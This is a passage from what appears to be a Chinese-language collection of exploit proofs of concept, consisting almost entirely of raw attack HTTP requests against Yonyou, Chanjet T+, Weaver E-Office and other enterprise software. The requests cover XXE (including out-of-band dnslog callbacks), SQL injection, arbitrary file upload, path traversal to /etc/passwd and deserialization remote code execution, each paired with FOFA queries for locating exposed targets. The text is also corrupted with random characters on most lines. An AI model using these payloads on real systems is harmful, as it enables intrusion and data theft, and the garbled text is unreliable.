. I2 Y; z: Y, V2 p1 C" z& z7 MUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
/ _; |5 F$ c5 F7 a; q' l) E1 e: u# y( rAccept-Encoding: gzip, deflate1 w u" }8 V4 @# }0 d; l
Accept: */*) p" P k. v: {$ z4 T, g- `
Connection: close
, E! g* r! C' P; RaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
8 {1 C- y9 y. G% r$ k- CContent-Length: 190% K3 q: u) J. w' B, d& e E
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df01 N6 C$ p1 k, D) i, q4 _. K: ]% M
0 O- N, Z5 k, S* r0 v% X! F" [ H4 W
--fd28cb44e829ed1c197ec3bc71748df06 T$ y% m& o3 d% f. [& H
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp", ^% h! Z5 N9 g- C& b$ V" y
0 f4 l5 i) d5 M& g3 {7 a+ n5 R<%out.println(1111*1111);%>6 M5 V+ P- X, f
--fd28cb44e829ed1c197ec3bc71748df0--
& D! x. |* k7 ?) X# z( @( I0 K' O: R% |* W8 U6 q G( N
# G1 r( a9 l! @% ]/ A
36. 用友NC-Cloud soapFormat XXE0 Q* x: P! C1 y3 w/ i
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
, t, l/ l3 V4 V& NPOST /uapws/soapFormat.ajax HTTP/1.1' b- I/ F8 M2 t. n, F- |
Host: 192.168.40.130:8989
V" E5 C8 Y8 c5 r+ i5 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0% B. E% {& p4 ]# i4 i% E) _
Content-Length: 263* S8 S& t- r" l$ x( h9 ~- ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ j; E. r1 E, P
Accept-Encoding: gzip, deflate
# e P8 O. |: BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ F+ k+ y$ l& ]1 |* _ v8 p- g
Connection: close. n+ t* `' M+ g/ c- D8 j
Content-Type: application/x-www-form-urlencoded' {) y, L# i7 l, f4 a+ y2 e1 Q
Upgrade-Insecure-Requests: 1# z! q! S) A* P8 u! l
5 t1 o! A- i& Q9 P3 H5 {1 ~
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a6 P2 C! ]5 e& u+ j, H6 x& {# `
: Q! C( L4 _" |' x6 J
l. c& `6 Q' H! b2 I' p: b37. 用友NC-Cloud IUpdateService XXE
7 ?' ~- x, [( _9 z9 a* PFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ @# d9 ?. x4 M! Q- k* w$ x
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1" [' [; T' X: _, l( L! G
Host: 192.168.40.130:89897 O% I9 \) p% \6 P8 L. k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 l- E0 T3 O, b# H/ ]" U4 \Content-Length: 421
) j/ c: C) U8 |! M5 d/ v( r4 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 H Q& I. z' I7 ]8 @ `1 |" R5 [Accept-Encoding: gzip, deflate$ o5 H9 @! u% i( I
Accept-Language: zh-CN,zh;q=0.9
3 \3 f7 ?: f4 u4 Y: \5 m$ JConnection: close) Z8 l- a5 L$ l- I
Content-Type: text/xml;charset=UTF-8
, Y9 x$ z1 H$ o: q. ?/ v/ iSOAPAction: urn:getResult
?4 O. V7 E. O8 sUpgrade-Insecure-Requests: 1
' Z/ }. @7 a! ^+ G; N
" h4 x. E I9 H% x" Z<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">1 s( t/ e4 Q2 {1 N& m$ p9 I: k
<soapenv:Header/>1 S& Y6 N' N0 Z# X- x6 t
<soapenv:Body>
6 {5 m9 _ u1 @# U2 {1 ~6 |<iup:getResult>
( z0 n/ Y. ^, Q$ \$ A0 v+ M4 ~2 `( }<!--type: string-->* \ p5 f9 u2 Z; O* H- ~2 |
<iup:string><![CDATA[
, P5 {& q9 X6 m( M8 ?- s0 P<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
d: ~/ o: d( v3 b, b<xxx/>]]></iup:string>% P% O% W' |" {5 J q# R$ q
</iup:getResult>4 |# h/ V( b# t& u$ i
</soapenv:Body>
; H( m: U4 Q% e( g9 `3 }/ b4 q% T! i</soapenv:Envelope>: ~7 K" ?/ |6 w4 l2 U
5 e$ F7 F: h4 D& [* s1 ]
' ~; f) L6 W$ w4 p, J
3 Y- R* h+ P+ m+ y
38. 用友U8 Cloud smartweb2.RPC.d XXE- H/ L- `4 Y6 q' d/ O, z
FOFA:app="用友-U8-Cloud"' D H$ B5 M$ y% ~$ A
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1- C( O1 K6 Y' _: G
Host: 192.168.40.131:8088* z/ I/ E$ j4 X- X6 ]' I1 M2 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25% F8 @. v# s: q
Content-Length: 260
: L* u5 u6 N J. Q" ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3+ l3 D4 n+ R! |' K$ l* e' h
Accept-Encoding: gzip, deflate3 ~. n! _ w8 ]6 _9 q, o( q- s' `
Accept-Language: zh-CN,zh;q=0.9
) l# n1 s) A& HConnection: close
, Y/ B, q) ~" M9 [$ {; U+ d; mContent-Type: application/x-www-form-urlencoded
& m8 g# q0 R! D% |$ X1 Z0 _
* a( ^. _# ^1 }8 E. N# P__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
0 g. v* ^" e) U+ }$ z( v- h1 f; c6 K* d+ F1 Y
8 v3 ?" Z( G3 W8 O, P0 }39. 用友U8 Cloud RegisterServlet SQL注入1 e2 F1 V7 z7 I! D6 z6 Q
FOFA:title="u8c"! g4 k$ [; q- b" I! B8 }) \
POST /servlet/RegisterServlet HTTP/1.1
& J. T7 ?6 [7 m6 m; }, K+ \/ c, s UHost: 192.168.86.128:8089
8 ~: C; H' L' A. ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" k& l% @( Y! J# C3 L: Z
Connection: close
% ^: h# ^7 d1 y7 D$ n/ x/ l) IContent-Length: 85, N- m V1 c( [* b2 \- }# N& G' f3 U
Accept: */*4 ^+ p; x: i: n: D3 T/ h
Accept-Language: en6 X3 r$ v* T% K0 ~: \: E
Content-Type: application/x-www-form-urlencoded
! i$ P. e9 z/ q' mX-Forwarded-For: 127.0.0.15 b& z! z+ e- H' i0 u
Accept-Encoding: gzip
# j) m( ?& ~- K. K% p; U9 Y# _5 C1 f0 {% t: V. B: t y2 X$ k; }
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
6 V4 b' k; N2 K4 E; F; Q6 k$ R- g- H9 N6 c' `/ A% o2 f) y, n( V
- T$ _4 X- j9 s7 S( v% B( f40. 用友U8-Cloud XChangeServlet XXE/ \1 e) x! t* [8 X$ r; V
FOFA:app="用友-U8-Cloud"
( v5 {+ [/ [1 S! K- n2 x+ gPOST /service/XChangeServlet HTTP/1.1( x! W0 P# {! d" C7 q/ ? {& e
Host: x.x.x.x
6 F' k, v1 i# k# p. cUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 S* H0 @" r5 I# f: n& R. z
Content-Type: text/xml
& N7 ~1 m4 u/ m- o$ TConnection: close0 h; I7 Y+ m( ?* J; `. Z* [+ w* u
: y. G9 i' M/ Q8 ^6 L) d<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! h4 H- A# j9 f- {- |2 S
. r7 v/ a( _% W6 @+ v8 ^, _
$ V$ t, t) l- {/ Z; K1 a41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
$ `% ^! S. c$ u$ F' yFOFA:app="用友-U8-Cloud"
& F) p ~/ ]. Z6 E0 TGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
7 T4 _0 F% U d! R& NHost:. Z0 a* @- Z9 V. I4 ], `& ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, a' B \1 x8 A$ L+ i6 J1 vContent-Type: application/json
/ ]7 ?4 l+ j2 u: E; M# IAccept-Encoding: gzip3 S" ^, c, e# d. S5 z I/ o
Connection: close! s( X1 r6 Z J! a! X# b
- c ?. |/ N# A/ \% _0 I- ~1 a# W# a5 M, D
42. 用友GRP-U8 SmartUpload01 文件上传* [: O2 \. n# O0 Z
FOFA:app="用友-GRP-U8"& B3 g2 [; D# L3 {. Q2 E( s
POST /u8qx/SmartUpload01.jsp HTTP/1.1
4 f& M- F! {9 m0 EHost: x.x.x.x2 P. A9 H) b6 g5 h$ X7 {' M
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt# K; K7 z1 c& D) ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36# p; p8 n$ S' p* m/ F- I
' ]" B% b3 k3 B- ?( d
PAYLOAD: t' E8 s+ F" g: p
, }5 \4 F4 k( }4 u% b' z6 s
' m# a) b- i8 t! ^. Q% B
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml' I; X8 o5 A$ ~5 z8 w
$ ~! E# w# W: ]# T' s+ B
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
+ Z" x2 U: k! _* C7 @ G$ y8 i- ?+ N( \9 tFOFA:app="用友-GRP-U8"0 V$ }% Q1 I) _* N/ \* G$ c
POST /services/userInfoWeb HTTP/1.1. D- Y5 U# w1 f0 N
Host: your-ip
3 C; e% X; f5 Z7 G4 B; ^1 b' vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
& y- b8 j; A E# ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# `% k. ~% O- v. gAccept-Encoding: gzip, deflate
7 l4 ]9 F& g1 @ D, k7 PAccept-Language: zh-CN,zh;q=0.9
0 T+ ^4 P, h) ~Connection: close
6 ~+ Y$ i! k% b3 [8 W2 q+ SSOAPAction:1 L5 f# c$ P2 }( `
Content-Type: text/xml;charset=UTF-8
3 c. S3 ^: O8 Q c4 v* V- k6 ~& E7 w2 L% w
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">9 H- _9 O: D) q
<soapenv:Header/>
* {% c: h5 e3 d; ^+ R <soapenv:Body># h4 U4 ?( z6 q
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">! O0 J2 x: Q% k
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>0 o* L7 D3 H7 K" C* `# J
</ser:getUserNameById>1 ~9 ^: g8 i) P: L5 A% \. p
</soapenv:Body>3 y" ~" y5 B/ ~# y5 K
</soapenv:Envelope>/ U" O( J! m) `1 W0 u, \
, [4 G; U Q9 C& C
+ o, e6 I! E6 A4 g' r& ~
44. 用友GRP-U8 bx_dj_check.jsp SQL注入8 X7 {4 O& I8 N# x1 P% O
FOFA:app="用友-GRP-U8"; F# a" P6 O! D9 Q1 Y
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
4 i1 |" P5 v% VHost: your-ip; H4 O1 F6 r& D t/ I7 p4 z0 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
4 T4 Z3 H1 d. p2 S! EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 O& @* Y6 I9 w% M) \$ g) P* \
Accept-Encoding: gzip, deflate
' `$ g$ ?4 V! r% s& }Accept-Language: zh-CN,zh;q=0.9
: T9 M3 |8 y- e) L1 u& |Connection: close# ]0 u7 y& ?1 W0 T+ ]- U
! f# n- O/ Q( X! h4 m; {. a: t
; u9 d5 Z+ K8 K7 W9 S45. 用友GRP-U8 ufgovbank XXE* X3 J3 F7 @3 `3 C$ z
FOFA:app="用友-GRP-U8"
~ v! F: G& l5 l4 {POST /ufgovbank HTTP/1.1! b2 }: {( [5 s1 F! {! U: |/ ~7 E
Host: 192.168.40.130:222. |$ {, S6 H2 B8 J {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
- X0 r+ z1 q B* x, [Connection: close
9 ^2 \ w& ?6 t% `1 p) T6 w8 J) FContent-Length: 161
! I. M2 O; h) e5 O3 g4 I/ ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 n( Z7 f. T9 v( f1 F* HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" o/ v" z7 t# qContent-Type: application/x-www-form-urlencoded' c! A: t: ~* \( T
Accept-Encoding: gzip8 O/ K; O$ ?) \
5 `2 B. a8 Y" DreqData=<?xml version="1.0"?> c* r9 W2 I5 h. E
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest$ n, _& s% q$ P0 ~5 r
5 j* { ]9 ~6 M; D( A
1 W6 S) q# D& T* ]- n
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
* Z/ O/ D. k3 F7 E" Z1 L0 qFOFA:app="用友-GRP-U8"0 q+ E- G% f( g- w; C2 H; N
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
4 K5 Q- u# k4 V5 L! e7 f5 K2 THost: your-ip
3 e- m% j; I! T* l! y" jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
& B- z: Y) `% d8 a+ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% F- Y w/ M' d y
Accept-Encoding: gzip, deflate( ^! k! P0 M3 d% R% f
Accept-Language: zh-CN,zh;q=0.99 }% [) M# w3 ]
Connection: close
1 H/ M9 O( M- x3 _" i+ M' e/ X3 p& ^2 x j: Q
% D. o) o; V2 D! X# X2 [47. 用友GRP A++Cloud 政府财务云 任意文件读取! l, |% k# z' v
FOFA:body="/pf/portal/login/css/fonts/style.css"
' N1 K; g% N! W; JGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.13 V2 y5 E- x6 ~6 a% E" g- ^
Host: x.x.x.x
& G& {. O, H0 S( NCache-Control: max-age=0
8 w: t: h7 j) l, cUpgrade-Insecure-Requests: 15 K. I+ e& \) e/ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; u# U+ J. F- b) N+ X" IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 Y- j4 _8 `" q1 y
Accept-Encoding: gzip, deflate, br
1 m$ b2 Q. H* f+ B) X% O1 BAccept-Language: zh-CN,zh;q=0.9
. A/ d( n3 |* \7 ]" Q4 g2 V: }If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT$ B' N8 P9 k1 m3 [* n
Connection: close
L7 j/ ~9 V+ i" Y: n" C
, G7 U0 q c0 f$ J5 _8 \4 V- H7 {! n, J
0 v3 o+ @' b. X: E1 O, q5 }48. 用友U8 CRM swfupload 任意文件上传
7 t6 q p7 ^' r1 Z, z1 ]/ FFOFA:title="用友U8CRM"
) b0 |) M' ]& S+ j; A7 |: YPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
5 X4 T4 R/ L! H, z; y p! t# ]# I+ oHost: your-ip1 ~: q) ~% P1 o' { ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* R% x2 [1 `, T1 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* r/ R# U9 {7 }! r! I% mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% v) p/ e3 d/ P2 [' `1 T, R8 cAccept-Encoding: gzip, deflate8 i$ ?, x) ^% m8 F+ _
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
8 P S9 r$ g& w. i1 j' t- s------269520967239406871642430066855
& w5 F# i# ^0 V# qContent-Disposition: form-data; name="file"; filename="s.php"
" W7 M$ q. e1 q ?6 Z1231
3 j4 g6 w, T/ p. v, X8 lContent-Type: application/octet-stream
4 u ?) w, R* _( O------269520967239406871642430066855
' n7 q# k" N* l$ b* ?& }Content-Disposition: form-data; name="upload"
6 J1 ^+ v% C7 N8 D9 T+ J: l7 qupload
/ ~% ]5 I( K3 _9 \------269520967239406871642430066855--
7 S5 o4 ?8 C2 i- ~+ b a& k! }6 y/ \7 {$ e' M
& _3 `, y7 [6 Z! L$ g7 @8 k49. 用友U8 CRM系统uploadfile.php接口任意文件上传' g5 N3 Y3 W# \. \8 J
FOFA:body="用友U8CRM") W! l8 g5 [7 h3 S1 s
% [/ W3 y: w7 M1 APOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
5 E" K7 D" w; U" O5 O3 ~( eHost: x.x.x.x" I2 ~* G3 X" C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# W$ s' u6 R1 |0 v8 R) z' {8 @2 Z
Content-Length: 329
# U8 X0 b' d" E6 b4 u+ l: zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 R5 X4 V: K" B7 aAccept-Encoding: gzip, deflate
- d1 Z3 C* y* O7 I& x/ H: SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 s( ~7 u7 A; ?0 p5 xConnection: close" S, l0 Y. o1 u: C4 j/ X3 W
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
) [- r. R" @0 z, Z! Q9 l2 T# }& v
-----------------------------vvv3wdayqv3yppdxvn3w( Q. G4 Z Y1 P4 w8 f
Content-Disposition: form-data; name="file"; filename="%s.php "
5 ?' C0 _6 ?4 Q& R0 BContent-Type: application/octet-stream2 {* H7 C- ^5 e" [
1 G" q% ^1 u: m. F/ N2 X; ^2 T
wersqqmlumloqa
# A( M0 E5 G9 P7 D1 ^-----------------------------vvv3wdayqv3yppdxvn3w
* m# |0 Z# c/ u5 G; ?! T( k; _Content-Disposition: form-data; name="upload"
/ G k: P. M, z6 K6 Q
% S4 m& w9 y6 q9 A1 \upload! r* g4 i( P2 G$ J7 r" D! v5 R
-----------------------------vvv3wdayqv3yppdxvn3w--$ B# [ r7 ?5 a0 S) w0 K# V
. T3 _9 f- j7 V w; c5 r
+ ?% G, e4 |- T4 F% @7 O6 |http://x.x.x.x/tmpfile/updB3CB.tmp.php
! w% s7 ?) I2 K1 k# S' j- P8 u( ]! e
50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 ~( w% U7 s) Q6 lFOFA:body="close closebtnmodal"1 f7 ` Z. v1 ?1 B4 R
POST /course/filterRecords/ HTTP/1.13 C; R- k( w. J2 |9 r' |
Host: x.x.x.x
l+ m: x- i: V( S8 c7 d' ^8 y7 y9 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 c9 C" M: c' B. S) D% MConnection: close8 E4 E' [* |- Y6 _; @
Content-Length: 224
/ O; y) A" {5 H7 dAccept: */*
& O! }7 n% K' b8 b- GAccept-Language: en
% l2 Y+ ?; @1 j7 UContent-Type: application/x-www-form-urlencoded! h9 V+ t& L/ p9 e
Accept-Encoding: gzip
; _9 ]- q. s/ v+ H$ q& d# T1 o% p* a# Z. i, M& B& S
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1/ D4 [/ M0 S$ C( a9 n q/ o' j" n. i& E
+ E* W: d" O, }) |- R9 e6 R+ k, v2 L d) M! n, S# d- X9 |/ g
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入2 H X6 i( d! ?- n
FOFA:app="云时空社会化商业ERP系统"/ t9 J+ _* {9 Q
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1( ], Q. t+ B0 A$ }% t- w/ l
Host: your-ip" d& y! w# U( I N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36% Y* ]( T' o# ~' X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ G; k: Z' ^2 M$ i3 k$ ?
Accept-Encoding: gzip, deflate, C/ J) l4 J6 {7 K: Z5 J1 F8 h
Accept-Language: zh-CN,zh;q=0.9
. H' M$ H4 @0 A* X, L M& ]: HConnection: close
8 I" }9 q, @' X/ n( C6 l, v* ~, M2 k
/ C- P9 N6 a$ @+ b
9 d. N( b+ t9 j( i" P# S52. 泛微E-Office json_common.php sql注入: R2 v1 b2 O& L
FOFA:app="泛微-EOffice"
! @6 b" p' A% n6 x9 YPOST /building/json_common.php HTTP/1.1
! a5 t* P) `) J/ D. o8 XHost: 192.168.86.128:8097$ C9 f# Q2 P1 w: i3 u
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' m j! ]9 k$ @) q! D4 b
Connection: close
' ~& _' \! F3 j! xContent-Length: 87# ?( A" l! r. h+ H! |4 k3 Y
Accept: */*
' N/ Y, O& P2 G7 j9 tAccept-Language: en
/ d5 q$ _* U! {; V4 n) R: XContent-Type: application/x-www-form-urlencoded# Y4 L: h2 V. H* j6 @0 {! \2 S& [
Accept-Encoding: gzip3 V/ R: g7 e& F- z; g
3 x, ~1 W s% Z' n2 D( O5 S* j" }tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
2 C) Y8 M* o" ] G! W/ k, @% g1 ^' n; F4 p
7 i! o, q! w- h" \' j
53. 迪普 DPTech VPN Service 任意文件上传
3 h0 {) n3 o& TFOFA:app="DPtech-SSLVPN"" c2 P# k4 \ h `9 {
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
- A! _1 ^( d; H2 `8 I; u# B1 ~; U9 c) p
& E' Y, {, n5 s( w% Y- G54. 畅捷通T+ getstorewarehousebystore 远程代码执行
6 y X# B: s2 ] w( g* _8 ?FOFA:app="畅捷通-TPlus") M# `' [, a: Q. P! F3 d
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
$ \& T( _; d" J4 }% I6 K$ Q$ z"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
. U. s0 Y( Q' G/ I* c6 V* z2 N! m E7 w) o
: h$ u8 f5 Q7 o! e- N8 K; J$ p& l完整数据包
9 ?- f& p0 V7 xPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
* c# T2 L$ ]) [% }8 ]Host: x.x.x.x
0 {+ T2 }+ h# i* vUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
) O0 ~) T- M1 G' L- `/ Q4 GContent-Length: 593% U" C0 f- v8 P3 y t
/ o- l6 N4 v- z{& g8 m) `# d) U. i e
"storeID":{9 D1 ]7 V6 h% l( D, I( K6 n
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
6 m$ @4 v( N) C! E "MethodName":"Start",) T. Z+ B4 l9 \6 `) i) M2 j
"ObjectInstance":{ a( G; j. B$ P# t9 n) e& N3 F
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ Y: m6 i0 y( m "StartInfo":{; ~2 B0 `7 t) G! n7 O
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
; d3 u: o/ n. ` "FileName":"cmd",
$ r& G; z, l) y% t, D8 M "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"8 ?, M+ O# ~, _
}' Q8 W3 `2 ?) g5 i5 e8 h# H* F/ I
}
0 u( ?. ?# O- E2 }' [% E- N2 o" k }
, T' ~5 z+ k. u}
5 s3 t3 ^& \4 ~" ?* z
7 v Q; ~! m9 g$ L) T5 x; T$ c l$ `& G
第二步,访问如下url
0 E6 {: O: l. A8 x, E, F: J/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt, t$ [: |7 ^! e& q
/ ^4 _- v2 ^( }0 l) E; R, d$ U# I
0 y6 n3 y3 W9 t55. 畅捷通T+ getdecallusers信息泄露5 a) M: _3 ] O4 i/ b9 O
FOFA:app="畅捷通-TPlus"
1 k G5 a+ x+ p第一步,通过
3 U/ B x9 q# S: p0 O/ j: ^/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie& I) J( T2 l9 D: r
第二步,利用获取到的Cookie请求$ ^$ Z# b; B/ _; s: c$ P7 W" S+ ]
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers% x- l S/ X+ e7 ^! t' p u9 u, ?
* T& `; y! t7 M; Z3 u& V1 q/ f) p56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
' ~ z& ]7 G+ s8 W+ ?1 wFOFA: app="畅捷通-TPlus"
! l" @5 {; i+ n' ~8 Y; q+ TPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ r7 p! Y; f7 F$ C7 N
Host: x.x.x.x
